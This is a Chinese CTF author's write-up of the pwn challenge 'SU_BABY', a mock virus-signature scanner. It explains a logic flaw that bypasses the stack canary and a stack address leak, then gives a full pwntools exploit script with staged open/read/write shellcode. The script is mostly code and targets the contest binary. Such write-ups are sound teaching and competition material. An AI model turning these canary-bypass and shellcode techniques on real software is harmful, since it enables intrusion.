SU_CTF出题小记之SU_BABY

作为一个萌新，很荣幸能给SU_CTF出道题，各位师傅也是太强了很快就给我秒了

SU_BABY

其实还有其他两个版本，然后由于时间比较匆忙其他两个版本没调试好，导致shellcode考察的比较简单，所以我估摸着会有很多非预期解，师傅们轻点喷

该题主要是模拟了一个病毒特征码检测小程序，总共存在9个功能

该题的主要漏洞是在add_file中存在的逻辑漏洞，而且是无法直接看出来的需要在gdb中调试中得到，填满第一个栈后与后一个栈里面的内容连接在一起经过strlen长度判断为14，那么下次就是x+14的位置读入（x为当前读入位置），合理的控制的话可以直接绕过canary保护

泄露栈地址

利用printf不输入回车会导致后面的内容一起被打印出来，然后将栈地址

利用add_sigID读入，找到栈地址并读入，然后利用display_sigdb打印出来，这里display_sigdb不能直接调用，但因为query_infiles没有break，可通过执行query_infiles进行调用

然后就是进入attack进行构造read和orw即可

from tools import *
p=process("./ASU1")
# p=remote("1.95.76.73",10001)
context(log_level='debug', os='linux', arch='amd64')

def add_id(id,name,ct):
    p.sendlineafter("操作:",str(1))
    p.sendlineafter("ID:",id)
    p.sendlineafter("名称:",name)
    p.sendafter("征码值:",ct)

def add_file(ct):
    p.sendlineafter("文件名称",b'a')
    p.sendlineafter("请输入文件内容",ct)
debug(p,0x4014FB)
attack=0x000400F56
add_id(b'22',b'xx',b'aa'+b'a'*0x26+b'cc')
p.sendlineafter("操作:",str(5))
p.sendlineafter("感染文件:",b'a')
stack=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
log_addr("stack")
stack_addr=stack-0x1ed50
p.sendlineafter("操作:",str(8))
p.sendlineafter("文件数据:",str(14))
# debug(p,0x4026ff)
add_file(b'a'*4+b'\x00')
add_file(b'a'*6+b'\x00')
add_file(b'a'*6+b'\x00')
add_file(b'a'*7)
add_file(b'b')
add_file(b'c'*6+b'\x00')
add_file(p64(attack))
log_addr("stack")
log_addr("stack_addr")

target1=0x14068+stack_addr-0x590
shellcode = asm(f'''
    xor edi,edi    
    xchg rsi,rdx
    add rsi,0xb
    syscall              
''')

payload=shellcode
p.sendafter("nity",payload)
log_addr('target1')
# debug(p,0x400f3d)
p.sendafter("do?",p64(target1))

sleep(0.1)

shellcode = asm("""
xor rsi,rsi 
push 0x67616c66
mov rdi,rsp
push 2
pop rax 
syscall

mov rsi,rdi
mov edi,3
mov edx,0x50
xor eax,eax
syscall

push 1
pop rdi
push rsp
pop rsi

push 0x50
pop rdx
push 1
pop rax
syscall
""")

payload=shellcode
p.sendline(payload)

p.interactive()

• 本文作者： NEWYM
• 本文链接： http://example.com/2025/01/14/SU_BABY/
• 版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！